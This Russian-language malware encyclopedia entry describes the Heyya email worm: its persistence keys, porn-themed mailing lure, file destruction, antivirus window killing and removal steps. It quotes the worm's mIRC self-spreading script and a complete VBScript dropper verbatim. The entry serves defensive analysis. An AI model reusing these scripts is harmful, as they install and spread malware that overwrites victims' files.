Email-Worm.Win32.Heyya

Материал из Total Malware Info

Перейти к: навигация, поиск

Email-Worm.Win32.Heyya Вирус-червь. Распространяется через Интернет в виде файлов, прикрепленных к зараженным письмам. Является приложением Windows (PE-EXE файл). Имеет размер 28672 байт.

Содержание

Инсталляция

Копирует свой исполняемый файл как: 

%System%\satanik.exe
%System%\satanikchild.exe
%System%\evil_Wormz2u.exe
%System%\FreeSoftGSM.exe
%System%\game.exe
%System%\call.exe
C:\update.exe
C:\NewFilmSATANIK.scr
C:\Satanik_ChildsCryptoLab.exe
%WinDir%\PornoChat.exe

Для автоматического запуска при следующем старте системы червь добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра: 

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“MicrosoftOE”=”%WinDir%\PornoChat.exe”
“EVILPHILE”=”%System%\satanik.exe”

Изменяет значение следующего ключа реестра: 

[HKCR\exefile\shell\open\command]
“default”=” C:\Satanik_ChildsCryptoLab.exe %1”

Таким образом червь будет запускаться каждый раз, когда пользователь запускает какое-либо приложение.

Распространение по электронной почте

Поиск адресов для отправки писем производится в адресной книге Windows. Рассылка производится с использованием почтового API Windows(MAPI). Тема письма содержит строку: 

Pornocity

Тело письма следующее: 

Hi friend, new real pornochat + live cam.! FREE

Имя файла вложения: 

PornoChat.exe

Деструктивная активность

Создает ключ реестра, в котором хранит свои настройки: 

[HKLM\SOFTWARE\EvilPhileLab]

Записывает в следующие файлы: 

C:\mirc\script.ini
C:\mirc32\script.ini
C:\Program Files\mirc\script.ini
C:\Program Files\mirc32\script.ini

следующий текст: 

[script]
;Warning! Warning!
;Dont delete file script.ini
n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
n1=/dcc send $nick C:\NewFilmSATANIK.scr

данный текст является скриптом для mIRC, который рассылает исполняемый файл червя всем присоединяющимся к каналу пользователям.

Производит поиск на жестком диске файлов с расширениями: .jpg, .arj, .rar и перезаписывает их содержимое заполняя мусором.

Произодит поиск на жестком диске файлов с расширением .vbs и перезаписывает их содержимое следующим текстом: 

' OMEN by Satanik[NATAS]
Dim jseljmasdfkljsdfmwer,Evil_Phile,Evil_PhileA,jkakljcaldsmkiuskla
Set jseljmasdfkljsdfmwer = CreateObject("Scripting.FileSystemObject")
Set jkakljcaldsmkiuskla = jseljmasdfkljsdfmwer.GetSpecialFolder(0)
Set Evil_Phile = jseljmasdfkljsdfmwer.CreateTextFile("C:\Satanik.scr", True)
Evil_Phile.WriteLine "N satanik.com"
Evil_Phile.WriteLine "RCX"
Evil_Phile.WriteLine "7000"
Evil_Phile.WriteLine "W"
Evil_Phile.WriteLine "Q"
Evil_Phile.close
Set jseljmasdfkljsdfmwer = CreateObject("Scripting.FileSystemObject")
Set Evil_PhileA = jseljmasdfkljsdfmwer.CreateTextFile(jkakljcaldsmkiuskla&"\winstart.bat", True)
Evil_PhileA.WriteLine "@ cd \"
Evil_PhileA.WriteLine "@ "&jkakljcaldsmkiuskla&"\smartdrv.exe"
Evil_PhileA.WriteLine "@ debug < satanik.scr"
Evil_PhileA.WriteLine "@ Copy satanik.com "&jkakljcaldsmkiuskla&"\satanik.exe"
Evil_PhileA.WriteLine "@ cls"
Evil_PhileA.WriteLine "@ del "&jkakljcaldsmkiuskla&"\winstart.bat"
Evil_PhileA.close
Set Regedit = CreateObject("WScript.Shell")
Regedit.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EVILPHILE",jkakljcaldsmkiuskla&"\satanik.exe"

при запуске зараженного скрипта производится инсталляция червя в систему.

Производит поиск на всем жестком диске файлов с расширением .exe и замещает их содержимое своим телом.

Закрывает окна со следующими заголовками: 

AVP Monitor
AVG Control Center
Amon Antivirus Monitor

Изменяет значение стартовой страницы Internet Explorer: 

[HKLM\Software\Microsoft\Internet Explorer\Main]
“Start Page”=”www.natas.cz/satanik/666/update.gif”

[HKCU\Software\Microsoft\Internet Explorer\Main]
“Start Page”=”www.natas.cz/satanik/666/update.gif”

Создает файл: 

C:\natas.txt

Содержит следующую строку: 

EVILPHILE by Satanik[NATAS]

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. При помощи <Диспетчера задач> завершить вредоносный процесс.
  2. Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  3. Удалить параметры ключа системного реестра:)
    4. [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“MicrosoftOE”=”%WinDir%\PornoChat.exe”
“EVILPHILE”=”%System%\satanik.exe”
  4. Удалить ключ системного реестра:
    5. [HKLM\SOFTWARE\EvilPhileLab]
  5. Удалить файлы:
    6. %System%\satanik.exe
%System%\satanikchild.exe
%System%\evil_Wormz2u.exe
%System%\FreeSoftGSM.exe
%System%\game.exe
%System%\call.exe
C:\update.exe
C:\NewFilmSATANIK.scr
C:\Satanik_ChildsCryptoLab.exe
%WinDir%\PornoChat.exe
C:\natas.txt
  6. Удалить все зараженные червем файлы.
  7. Восстановить оригинальное значение стартовой страницы Microsoft Internet Explorer.
  8. Изменить значение ключа системного реестра:
    9. [HKCR\exefile\shell\open\command]
“default”= "%1" %*".
Источник — «http://www.totalmalwareinfo.com/rus/Email-Worm.Win32.Heyya»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.